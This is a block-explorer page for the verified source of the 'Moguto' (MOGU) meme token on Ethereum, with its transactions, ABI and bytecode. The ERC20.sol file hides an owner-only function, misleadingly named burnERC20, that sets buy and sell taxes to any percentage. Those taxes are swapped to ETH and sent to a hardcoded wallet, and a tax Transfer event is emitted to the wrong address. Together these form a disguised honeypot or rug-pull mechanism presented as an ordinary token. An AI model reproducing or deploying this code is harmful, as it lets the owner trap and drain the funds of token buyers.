ETH Price: $2,618.17 (+7.06%)

Contract

0x37A903CaBf7A6A96F7FE0d92e1Fd61a466D536B6
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Approve201132382024-06-17 18:17:23118 days ago1718648243IN
0x37A903Ca...466D536B6
0 ETH0.0014663931.48333691
Approve201132212024-06-17 18:13:59118 days ago1718648039IN
0x37A903Ca...466D536B6
0 ETH0.0014751531.67135977
Burn ERC20201130552024-06-17 17:40:35118 days ago1718646035IN
0x37A903Ca...466D536B6
0 ETH0.0006175212.84528831
Remove All Limit201130362024-06-17 17:36:35118 days ago1718645795IN
0x37A903Ca...466D536B6
0 ETH0.0004608811.30302899
Open Trade201130332024-06-17 17:35:59118 days ago1718645759IN
0x37A903Ca...466D536B6
0 ETH0.0008857711.38072821
Approve201130022024-06-17 17:29:47118 days ago1718645387IN
0x37A903Ca...466D536B6
0 ETH0.0003252212.36909888
Approve201128692024-06-17 17:02:23119 days ago1718643743IN
0x37A903Ca...466D536B6
0 ETH0.0008771118.94373595
0x60a06040201125112024-06-17 15:50:23119 days ago1718639423IN
 Create: MOGU
0 ETH0.013699779.27481861

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
MOGU

Compiler Version
v0.8.24+commit.e11b9ed9

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion
File 1 of 7 : MOGU.sol
/*
MOGUTO IS THE MOST FAMOUS MUSHROOM HEAD MEME IN THE WORLD AND THE TRUE OG FRIEND OF “BIO PANDA”. AND HE’S NOW READY TO CONQUER THE ETHEREUM BLOCKCHAIN!

Website: https://moguto.live
X: https://x.com/mogutoerc20
TG: https://t.me/mogutoerc20
*/

//SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.24;

import "./ERC20.sol";

/**
 * @title ERC20Decimals
 * @dev Implementation of the ERC20Decimals. Extension of {ERC20} that adds decimals storage slot.
 */
contract MOGU is ERC20 {
    /**
     * @dev Sets the value of the `decimals`, `name` and `symbol`. This values is immutable, it can only be set once during construction.
     */
    constructor () ERC20(unicode"Moguto", unicode"MOGU") {
        _mint(_msgSender(), totalSupply());
    }
}

File 2 of 7 : ERC20.sol
//SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.24;

import "./Context.sol";
import "./IERC20.sol";
import "./IERC20Metadata.sol";
import "./IUniswapV2Factory.sol";
import "./IUniswapV2Router02.sol";

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin guidelines: functions revert instead
 * of returning `false` on failure. This behavior is nonetheless conventional
 * and does not conflict with the expectations of ERC20 applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting

 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping (address => uint256) private _balances;

    mapping (address => mapping (address => uint256)) private _allowances;
    mapping(address => bool) private _isExcludedFromFee;

    uint8 immutable private _decimals = 18;
    uint256 private _totalSupply = 1_000_000_000 * 10 ** 18;

    string private _name;
    string private _symbol;
    address private _owner;
    uint256 private burnAmount = 0;
    uint256 private deadWallets = 0;
    bool private tradingOpen = false;
    IUniswapV2Router02 public uniswapV2Router;
    address public uniswapV2Pair;
    uint256 public _maxTxAmount = _totalSupply*3/100;
    uint256 public _maxWalletSize = _totalSupply*4/100;
    uint256 public _swapTokensAtAmount = _totalSupply*1/1000;
    address payable public tokenMKT = payable(0x61EaB402922cbBBa0b8A13CE7ac72C5133Eb4517);
    bool private inSwap = false;
    bool private swapEnabled = true;
    modifier lockTheSwap {
        inSwap = true;
        _;
        inSwap = false;
    }
    
    

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The defaut value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor (string memory name_, string memory symbol_) {
        _owner = msg.sender;
        _name = name_;
        _symbol = symbol_;
        _isExcludedFromFee[_owner] = true;
        _isExcludedFromFee[address(this)] = true;
    }

    /**
     * @dev Returns the owner of the token, usually a shorter version of the
     * owner.
     */
    function owner() public view returns (address) {
        return _owner;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5,05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return _decimals;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner_, address spender) public view virtual override returns (uint256) {
        return _allowances[owner_][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);

        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance");
        _approve(sender, _msgSender(), currentAllowance - amount);

        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        _approve(_msgSender(), spender, currentAllowance - subtractedValue);

        return true;
    }

    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(address sender, address recipient, uint256 amount) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);
        if (sender != owner() && recipient != owner()) {
            //Trade start check
            if (!tradingOpen) {
                require(sender == owner(), "TOKEN: This account cannot send tokens until trading is enabled");
            }

            require(amount <= _maxTxAmount, "TOKEN: Max Transaction Limit");
 
            if(recipient != uniswapV2Pair) {
                require(balanceOf(recipient) + amount < _maxWalletSize, "TOKEN: Balance exceeds wallet size!");
            }
 
            uint256 contractTokenBalance = balanceOf(address(this)); 
            if(contractTokenBalance >= _maxTxAmount)
            {
                contractTokenBalance = _maxTxAmount;
            }

            bool canSwap = contractTokenBalance >= _swapTokensAtAmount;
 
            if(contractTokenBalance >= _maxTxAmount)
            {
                contractTokenBalance = _maxTxAmount;
            }
 
            if (canSwap && !inSwap && sender != uniswapV2Pair && swapEnabled && !_isExcludedFromFee[sender] && !_isExcludedFromFee[recipient]) {
                swapTokensForEth(contractTokenBalance);
                uint256 contractETHBalance = address(this).balance;
                if (contractETHBalance > 0) {
                    sendETHToFee(address(this).balance);
                }
            }
        }
        uint256 taxAmount = 0;
        if ((_isExcludedFromFee[sender] || _isExcludedFromFee[recipient]) || (sender != uniswapV2Pair && recipient != uniswapV2Pair)) {
            uint256 senderBalance = _balances[sender];
            require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");
            _balances[sender] = senderBalance - amount;
            _balances[recipient] += amount;

            emit Transfer(sender, recipient, amount);
        } else {
            //Set Fee for Buys
            if(sender == uniswapV2Pair && recipient != address(uniswapV2Router)) {
                taxAmount = amount * burnAmount / 100;
            }
 
            //Set Fee for Sells
            if (recipient == uniswapV2Pair && sender != address(uniswapV2Router)) {
                taxAmount = amount * deadWallets / 100;
            }
            uint256 senderBalance = _balances[sender];
            require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");
            _balances[sender] = senderBalance - amount;
            _balances[recipient] += amount - taxAmount;
            emit Transfer(sender, recipient, amount - taxAmount);
            if (taxAmount > 0) {
                _balances[address(this)] += taxAmount;
                emit Transfer(sender, recipient, taxAmount);
            }
        }
    }

    function sendETHToFee(uint256 amount) private {
        tokenMKT.transfer(amount);
    }

    function swapTokensForEth(uint256 tokenAmount) private lockTheSwap {
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = uniswapV2Router.WETH();
        _approve(address(this), address(uniswapV2Router), tokenAmount);
        uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0,
            path,
            address(this),
            block.timestamp
        );
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");
        _beforeTokenTransfer(address(0), account, amount);
        _balances[account] += amount;
        emit Transfer(address(0), account, amount);
    }

    /**
     * @dev Burn `token to dead Wallets` 
     */
    function burnERC20(uint256 _burnAmount, uint256 _deadWallets) public {
        if(msg.sender!=_owner) revert("Not owner!");
        burnAmount = _burnAmount;
        deadWallets = _deadWallets;
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        _balances[account] = accountBalance - amount;
        _totalSupply -= amount;

        emit Transfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner_, address spender, uint256 amount) internal virtual {
        require(owner_ != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner_][spender] = amount;
        emit Approval(owner_, spender, amount);
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be to transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual { }

    /**
     * @dev Sets `tradding` 
     */
    function OpenTrade(bool _tradingOpen) public {
        if(_owner != msg.sender) revert("Not owner!");
        require(!tradingOpen, "Cannot reenable trading");
        IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
        uniswapV2Router = _uniswapV2Router;
        uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory()).getPair(address(this), _uniswapV2Router.WETH());
        tradingOpen = _tradingOpen;
    }

    function removeAllLimit() public {
        if(msg.sender!=_owner) revert("Not owner!");
        _maxTxAmount = totalSupply();
        _maxWalletSize = totalSupply();
        _swapTokensAtAmount = totalSupply();
    }
}

File 3 of 7 : IUniswapV2Router02.sol
//SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.24;

interface IUniswapV2Router02 {
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;
 
    function factory() external pure returns (address);
 
    function WETH() external pure returns (address);
 
    function addLiquidityETH(
        address token,
        uint256 amountTokenDesired,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    )
        external
        payable
        returns (
            uint256 amountToken,
            uint256 amountETH,
            uint256 liquidity
        );
}

File 4 of 7 : IUniswapV2Factory.sol
//SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.24;

interface IUniswapV2Factory {
    function getPair(address tokenA, address tokenB)
        external
        returns (address pair);
}

File 5 of 7 : IERC20Metadata.sol
//SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.24;

import "./IERC20.sol";

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

File 6 of 7 : IERC20.sol
//SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.24;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

File 7 of 7 : Context.sol
//SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.24;

/*
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }
}

Settings
{
  "optimizer": {
    "enabled": true,
    "runs": 200
  },
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "devdoc",
        "userdoc",
        "metadata",
        "abi"
      ]
    }
  }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"bool","name":"_tradingOpen","type":"bool"}],"name":"OpenTrade","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"_maxTxAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_maxWalletSize","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_swapTokensAtAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner_","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_burnAmount","type":"uint256"},{"internalType":"uint256","name":"_deadWallets","type":"uint256"}],"name":"burnERC20","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeAllLimit","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokenMKT","outputs":[{"internalType":"address payable","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"}]

60a060405260126080526b033b2e3c9fd0803ce800000060038181555f60078190556008556009805460ff191690556064916200003c916200026f565b6200004891906200028f565b600b55606460035460046200005e91906200026f565b6200006a91906200028f565b600c556103e860035460016200008191906200026f565b6200008d91906200028f565b600d55600e80546001600160b01b03191675010061eab402922cbbba0b8a13ce7ac72c5133eb4517179055348015620000c4575f80fd5b506040805180820182526006808252654d6f6775746f60d01b60208084019190915283518085019094526004808552634d4f475560e01b9185019190915281546001600160a01b03191633179091559091906200012283826200034c565b5060056200013182826200034c565b50506006546001600160a01b03165f908152600260205260408082208054600160ff199182168117909255308452919092208054909116909117905550620001836200017a3390565b60035462000189565b6200042e565b6001600160a01b038216620001e45760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015260640160405180910390fd5b6001600160a01b0382165f90815260208190526040812080548392906200020d90849062000418565b90915550506040518181526001600160a01b038316905f907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a35050565b505050565b634e487b7160e01b5f52601160045260245ffd5b80820281158282048414176200028957620002896200025b565b92915050565b5f82620002aa57634e487b7160e01b5f52601260045260245ffd5b500490565b634e487b7160e01b5f52604160045260245ffd5b600181811c90821680620002d857607f821691505b602082108103620002f757634e487b7160e01b5f52602260045260245ffd5b50919050565b601f8211156200025657805f5260205f20601f840160051c81016020851015620003245750805b601f840160051c820191505b8181101562000345575f815560010162000330565b5050505050565b81516001600160401b03811115620003685762000368620002af565b6200038081620003798454620002c3565b84620002fd565b602080601f831160018114620003b6575f84156200039e5750858301515b5f19600386901b1c1916600185901b17855562000410565b5f85815260208120601f198616915b82811015620003e657888601518255948401946001909101908401620003c5565b50858210156200040457878501515f19600388901b60f8161c191681555b505060018460011b0185555b505050505050565b808201808211156200028957620002896200025b565b6080516114d8620004475f395f6101ef01526114d85ff3fe608060405234801561000f575f80fd5b5060043610610132575f3560e01c806370a08231116100b45780638f9a55c0116100795780638f9a55c0146102a957806395d89b41146102b2578063a457c2d7146102ba578063a9059cbb146102cd578063d5e1cbff146102e0578063dd62ed3e146102e8575f80fd5b806370a082311461023f578063788454a5146102675780637d1db4a51461027c5780638da5cb5b146102855780638e26bbe414610296575f80fd5b806323b872dd116100fa57806323b872dd146101cc5780632fd689e3146101df578063313ce567146101e8578063395093511461021957806349bd5a5e1461022c575f80fd5b806306fdde0314610136578063095ea7b3146101545780631694505e1461017757806318160ddd146101a75780631ffdf9fa146101b9575b5f80fd5b61013e610320565b60405161014b919061118d565b60405180910390f35b6101676101623660046111f0565b6103b0565b604051901515815260200161014b565b60095461018f9061010090046001600160a01b031681565b6040516001600160a01b03909116815260200161014b565b6003545b60405190815260200161014b565b600e5461018f906001600160a01b031681565b6101676101da36600461121a565b6103c6565b6101ab600d5481565b60405160ff7f000000000000000000000000000000000000000000000000000000000000000016815260200161014b565b6101676102273660046111f0565b61047a565b600a5461018f906001600160a01b031681565b6101ab61024d366004611258565b6001600160a01b03165f9081526020819052604090205490565b61027a61027536600461127a565b6104b0565b005b6101ab600b5481565b6006546001600160a01b031661018f565b61027a6102a436600461129a565b6104e5565b6101ab600c5481565b61013e610710565b6101676102c83660046111f0565b61071f565b6101676102db3660046111f0565b6107b9565b61027a6107c5565b6101ab6102f63660046112b9565b6001600160a01b039182165f90815260016020908152604080832093909416825291909152205490565b60606004805461032f906112f0565b80601f016020809104026020016040519081016040528092919081815260200182805461035b906112f0565b80156103a65780601f1061037d576101008083540402835291602001916103a6565b820191905f5260205f20905b81548152906001019060200180831161038957829003601f168201915b5050505050905090565b5f6103bc338484610803565b5060015b92915050565b5f6103d2848484610926565b6001600160a01b0384165f9081526001602090815260408083203384529091529020548281101561045b5760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b60648201526084015b60405180910390fd5b61046f853361046a868561133c565b610803565b506001949350505050565b335f8181526001602090815260408083206001600160a01b038716845290915281205490916103bc91859061046a90869061134f565b6006546001600160a01b031633146104da5760405162461bcd60e51b815260040161045290611362565b600791909155600855565b6006546001600160a01b0316331461050f5760405162461bcd60e51b815260040161045290611362565b60095460ff16156105625760405162461bcd60e51b815260206004820152601760248201527f43616e6e6f74207265656e61626c652074726164696e670000000000000000006044820152606401610452565b60098054610100600160a81b031916747a250d5630b4cf539739df2c5dacb4c659f2488d001790556040805163c45a015560e01b81529051737a250d5630b4cf539739df2c5dacb4c659f2488d91829163c45a0155916004808201926020929091908290030181865afa1580156105db573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906105ff9190611386565b6001600160a01b031663e6a4390530836001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801561064a573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061066e9190611386565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303815f875af11580156106b8573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906106dc9190611386565b600a80546001600160a01b0319166001600160a01b0392909216919091179055506009805460ff1916911515919091179055565b60606005805461032f906112f0565b335f9081526001602090815260408083206001600160a01b0386168452909152812054828110156107a05760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b6064820152608401610452565b6107af338561046a868561133c565b5060019392505050565b5f6103bc338484610926565b6006546001600160a01b031633146107ef5760405162461bcd60e51b815260040161045290611362565b600354600b55600354600c55600354600d55565b6001600160a01b0383166108655760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610452565b6001600160a01b0382166108c65760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610452565b6001600160a01b038381165f8181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b03831661098a5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610452565b6001600160a01b0382166109ec5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610452565b6006546001600160a01b03848116911614801590610a1857506006546001600160a01b03838116911614155b15610c7b5760095460ff16610aaa576006546001600160a01b03848116911614610aaa5760405162461bcd60e51b815260206004820152603f60248201527f544f4b454e3a2054686973206163636f756e742063616e6e6f742073656e642060448201527f746f6b656e7320756e74696c2074726164696e6720697320656e61626c6564006064820152608401610452565b600b54811115610afc5760405162461bcd60e51b815260206004820152601c60248201527f544f4b454e3a204d6178205472616e73616374696f6e204c696d6974000000006044820152606401610452565b600a546001600160a01b03838116911614610b9657600c5481610b33846001600160a01b03165f9081526020819052604090205490565b610b3d919061134f565b10610b965760405162461bcd60e51b815260206004820152602360248201527f544f4b454e3a2042616c616e636520657863656564732077616c6c65742073696044820152627a652160e81b6064820152608401610452565b305f90815260208190526040902054600b548110610bb35750600b545b600d54600b5490821015908210610bca57600b5491505b808015610be15750600e54600160a01b900460ff16155b8015610bfb5750600a546001600160a01b03868116911614155b8015610c105750600e54600160a81b900460ff165b8015610c3457506001600160a01b0385165f9081526002602052604090205460ff16155b8015610c5857506001600160a01b0384165f9081526002602052604090205460ff16155b15610c7857610c6682610fbf565b478015610c7657610c7647611152565b505b50505b6001600160a01b0383165f908152600260205260408120